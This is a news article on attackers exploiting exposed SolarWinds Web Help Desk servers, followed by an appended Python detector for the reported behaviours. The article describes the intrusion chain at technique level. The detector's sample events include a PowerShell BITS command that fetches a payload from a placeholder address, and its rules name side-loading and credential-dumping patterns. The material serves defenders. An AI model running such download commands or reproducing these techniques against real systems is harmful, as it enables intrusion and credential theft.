SolarWinds Web Help Desk Exploited for RCE in Multi-Stage Attacks on Exposed Servers
Source: The Hacker News
Ravie Lakshmanan
Feb 09, 2026 – Vulnerability / Endpoint Security
Microsoft observation
Microsoft has revealed that it observed a multi‑stage intrusion involving threat actors exploiting internet‑exposed SolarWinds Web Help Desk (WHD) instances to obtain initial access and laterally move across the organization’s network to other high‑value assets.
The Microsoft Defender Security Research Team noted that it is not clear whether the activity weaponized the recently disclosed flaws (CVE‑2025‑40551, CVSS 9.8 and CVE‑2025‑40536, CVSS 8.1) or a previously patched vulnerability (CVE‑2025‑26399, CVSS 9.8).
“Since the attacks occurred in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain an initial foothold,” the company said in a report published last week.
Vulnerabilities involved
- CVE‑2025‑40536 – security‑control‑bypass vulnerability that could allow an unauthenticated attacker to access restricted functionality.
- CVE‑2025‑40551 and CVE‑2025‑26399 – untrusted‑data deserialization flaws that could lead to remote code execution.
CISA action
Last week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE‑2025‑40551 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. Federal Civilian Executive Branch (FCEB) agencies were ordered to apply the fixes for the flaw by February 6, 2026.
Attack details
In the attacks detected by Microsoft, successful exploitation of the exposed SolarWinds WHD instance allowed the attackers to achieve unauthenticated remote code execution and run arbitrary commands within the WHD application context.
“Upon successful exploitation, the compromised service of a WHD instance spawned PowerShell to leverage [BITS – Background Intelligent Transfer Service] for payload download and execution,” noted researchers Sagar Patil, Hardik Suri, Eric Hopper, and Kajhon Soyini.
Follow‑up actions observed
- Downloaded legitimate components associated with Zoho ManageEngine (a remote‑monitoring‑and‑management solution) to enable persistent remote control.
- Enumerated sensitive domain users and groups, including Domain Admins.
- Established persistence via reverse SSH and RDP access; attempted to create a scheduled task that would launch a QEMU virtual machine under the SYSTEM account at startup, thereby masking activity while exposing SSH via port‑forwarding.
- Performed DLL side‑loading on some hosts using wab.exe (the Windows Address Book executable) to load a rogue DLL (sspicli.dll) that dumped LSASS memory for credential theft.
In at least one case, Microsoft reported that the threat actors conducted a DCSync attack (MITRE ATT&CK T1003.006), simulating a Domain Controller to request password hashes and other sensitive data from the Active Directory database.
Mitigation recommendations
- Patch SolarWinds WHD instances promptly and keep them up‑to‑date.
- Identify and remove any unauthorized RMM tools (e.g., rogue Zoho ManageEngine components).
- Rotate service‑account and administrative passwords.
- Isolate compromised machines to limit further lateral movement.
- Monitor for abnormal use of legitimate binaries (e.g., wab.exe) and for unexpected scheduled tasks or virtual‑machine launches.
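As an added illustration of the monitoring recommendation above (example code, not part of the article or of Microsoft's report), a small Python detector that runs over constructed process-creation, image-load and task-creation events and flags the three behaviours the report describes: the WHD service spawning PowerShell that uses BITS, wab.exe loading sspicli.dll from outside the Windows system directories, and a scheduled task launching QEMU as SYSTEM. The JSON-lines format, field names, the "WebHelpDesk" path marker and all sample values are assumptions for this example.

```python
import json
from typing import Optional

# Constructed JSON-lines telemetry (not real logs); field names are assumptions, not a product schema.
SAMPLE_EVENTS = r"""
{"event": "ProcessCreate", "parent": "C:\\Program Files\\WebHelpDesk\\bin\\jre\\bin\\java.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell -w hidden Start-BitsTransfer -Source http://203.0.113.5/a.bin -Destination C:\\Users\\Public\\a.bin"}
{"event": "ImageLoad", "image": "C:\\Program Files\\Windows Mail\\wab.exe", "module": "C:\\Users\\Public\\sspicli.dll"}
{"event": "ImageLoad", "image": "C:\\Program Files\\Windows Mail\\wab.exe", "module": "C:\\Windows\\System32\\sspicli.dll"}
{"event": "TaskCreate", "user": "NT AUTHORITY\\SYSTEM", "action": "C:\\ProgramData\\q\\qemu-system-x86_64.exe -m 1024 -hda disk.qcow2"}
{"event": "ProcessCreate", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe"}
"""

WHD_PATH_MARKER = "webhelpdesk"  # assumption: the WHD install path contains this; adjust per deployment
BITS_MARKERS = ("start-bitstransfer", "bitsadmin")
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def classify(event: dict) -> Optional[str]:
    """Return a rule name when the event matches one of the three observed behaviours."""
    kind = event.get("event")
    if kind == "ProcessCreate":
        parent, image = event.get("parent", "").lower(), event.get("image", "").lower()
        cmdline = event.get("cmdline", "").lower()
        # WHD's Java service spawning PowerShell that drives BITS for a payload download
        if (WHD_PATH_MARKER in parent and image.endswith("\\powershell.exe")
                and any(m in cmdline for m in BITS_MARKERS)):
            return "whd-spawns-powershell-bits"
    elif kind == "ImageLoad":
        image, module = event.get("image", "").lower(), event.get("module", "").lower()
        # wab.exe resolving sspicli.dll from anywhere but the Windows system directories
        if (image.endswith("\\wab.exe") and module.endswith("\\sspicli.dll")
                and not module.startswith(TRUSTED_DLL_DIRS)):
            return "wab-sspicli-sideload"
    elif kind == "TaskCreate":
        # a scheduled task that starts QEMU under the SYSTEM account
        if "qemu" in event.get("action", "").lower() and event.get("user", "").upper().endswith("\\SYSTEM"):
            return "qemu-task-as-system"
    return None


def scan(jsonl: str) -> list:
    """Run classify() over JSON-lines text; returns (line_no, rule) pairs for the hits."""
    hits = []
    for n, line in enumerate(jsonl.splitlines(), 1):
        rule = classify(json.loads(line)) if line.strip() else None
        if rule:
            hits.append((n, rule))
    return hits


if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))  # [(2, 'whd-spawns-powershell-bits'), (3, 'wab-sspicli-sideload'), (5, 'qemu-task-as-system')]
```

The legitimate System32 copy of sspicli.dll on line 3 of the sample and the unrelated notepad launch are deliberately left unflagged, so the rules can be checked against benign events as well as the reported ones.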
“This activity reflects a common but high‑impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored,” the Windows maker said.
“In this intrusion, attackers relied heavily on living‑off‑the‑land techniques…”
Takeaways
- Defense in depth
- Timely patching of internet‑facing services
- Behavior‑based detection across identity, endpoint, and network layers